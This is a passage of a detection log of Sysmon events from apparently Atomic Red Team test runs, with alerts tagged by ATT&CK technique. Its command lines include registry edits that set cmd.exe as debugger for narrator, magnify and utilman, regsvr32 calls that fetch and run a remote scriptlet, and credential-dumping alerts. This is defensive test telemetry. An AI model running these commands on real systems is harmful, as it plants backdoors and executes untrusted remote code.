SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547814.692289,2019-07-19T18:50:14.692289+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," 1 5 4 1 0 0x8000000000000000 3745 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:14.649 747F3D96-D8A6-5D31-0000-001053A73200 6888 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547814.678185,2019-07-19T18:50:14.678185+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3744 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:13.173 747F3D96-D8A5-5D31-0000-0010C0A03200 6116 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547813.127595,2019-07-19T18:50:13.127595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," 1 5 4 1 0 0x8000000000000000 3741 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:13.096 747F3D96-D8A5-5D31-0000-0010729B3200 4212 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547813.109148,2019-07-19T18:50:13.109148+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3740 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:10.306 747F3D96-D8A2-5D31-0000-0010D8943200 2484 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547810.282757,2019-07-19T18:50:10.282757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," 1 5 4 1 0 0x8000000000000000 3737 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:10.253 747F3D96-D8A2-5D31-0000-00108A8F3200 6156 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547810.26663,2019-07-19T18:50:10.266630+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3736 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:07.335 747F3D96-D89F-5D31-0000-0010BC823200 2404 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1003 ] Credential Dumping ImageLoad,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," 7 3 4 7 0 0x8000000000000000 1103 Microsoft-Windows-Sysmon/Operational DESKTOP-NTSSLJD - 2020-10-20 11:51:09.588 23F38D93-CEB4-5F8E-9F08-000000000C00 9392 C:\Windows\System32\mmc.exe C:\Windows\System32\samlib.dll 10.0.18362.1049 (WinBuild.160101.0800) SAM Library DLL Microsoft® Windows® Operating System Microsoft Corporation SAMLib.DLL SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B true Microsoft Windows Valid ",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational [T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," 7 3 4 7 0 0x8000000000000000 1103 Microsoft-Windows-Sysmon/Operational DESKTOP-NTSSLJD - 2020-10-20 11:51:09.588 23F38D93-CEB4-5F8E-9F08-000000000C00 9392 C:\Windows\System32\mmc.exe C:\Windows\System32\samlib.dll 10.0.18362.1049 (WinBuild.160101.0800) SAM Library DLL Microsoft® Windows® Operating System Microsoft Corporation SAMLib.DLL SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B true Microsoft Windows Valid ",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548027.083068,2019-07-19T18:53:47.083068+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ),1," 1 5 4 1 0 0x8000000000000000 4046 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:46.938 747F3D96-D97A-5D31-0000-00102BE33800 4628 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," 1 5 4 1 0 0x8000000000000000 4045 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:46.867 747F3D96-D97A-5D31-0000-001019DE3800 5828 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," 1 5 4 1 0 0x8000000000000000 4045 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:46.867 747F3D96-D97A-5D31-0000-001019DE3800 5828 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," 1 5 4 1 0 0x8000000000000000 4045 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:46.867 747F3D96-D97A-5D31-0000-001019DE3800 5828 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," 1 5 4 1 0 0x8000000000000000 4044 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:46.831 747F3D96-D97A-5D31-0000-00109DDC3800 3564 C:\Windows\SysWOW64\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," 1 5 4 1 0 0x8000000000000000 4044 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:46.831 747F3D96-D97A-5D31-0000-00109DDC3800 3564 C:\Windows\SysWOW64\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," 1 5 4 1 0 0x8000000000000000 4044 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:46.831 747F3D96-D97A-5D31-0000-00109DDC3800 3564 C:\Windows\SysWOW64\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1563548026.848703,2019-07-19T18:53:46.848703+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4043 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-19 14:53:40.896 747F3D96-D978-5D31-0000-0010EB313800 2076 C:\Windows\System32\regsvr32.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49728 false 151.101.0.133 443 https ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548026.589404,2019-07-19T18:53:46.589404+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4042 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:46.405 747F3D96-D97A-5D31-0000-001089BD3800 7148 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1563548026.565529,2019-07-19T18:53:46.565529+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," 1 5 4 1 0 0x8000000000000000 4041 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:46.135 747F3D96-D97A-5D31-0000-00105DA83800 4336 C:\Windows\System32\calc.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Calculator Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\calc.exe" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 747F3D96-D978-5D31-0000-0010EB313800 2076 C:\Windows\System32\regsvr32.exe regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll)",1," 1 5 4 1 0 0x8000000000000000 4038 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:44.049 747F3D96-D978-5D31-0000-0010EB313800 2076 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-D978-5D31-0000-0010442F3800 2832 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 4038 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:44.049 747F3D96-D978-5D31-0000-0010EB313800 2076 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-D978-5D31-0000-0010442F3800 2832 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 4038 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:44.049 747F3D96-D978-5D31-0000-0010EB313800 2076 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-D978-5D31-0000-0010442F3800 2832 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1," 1 5 4 1 0 0x8000000000000000 4037 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:44.010 747F3D96-D978-5D31-0000-0010442F3800 2832 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( 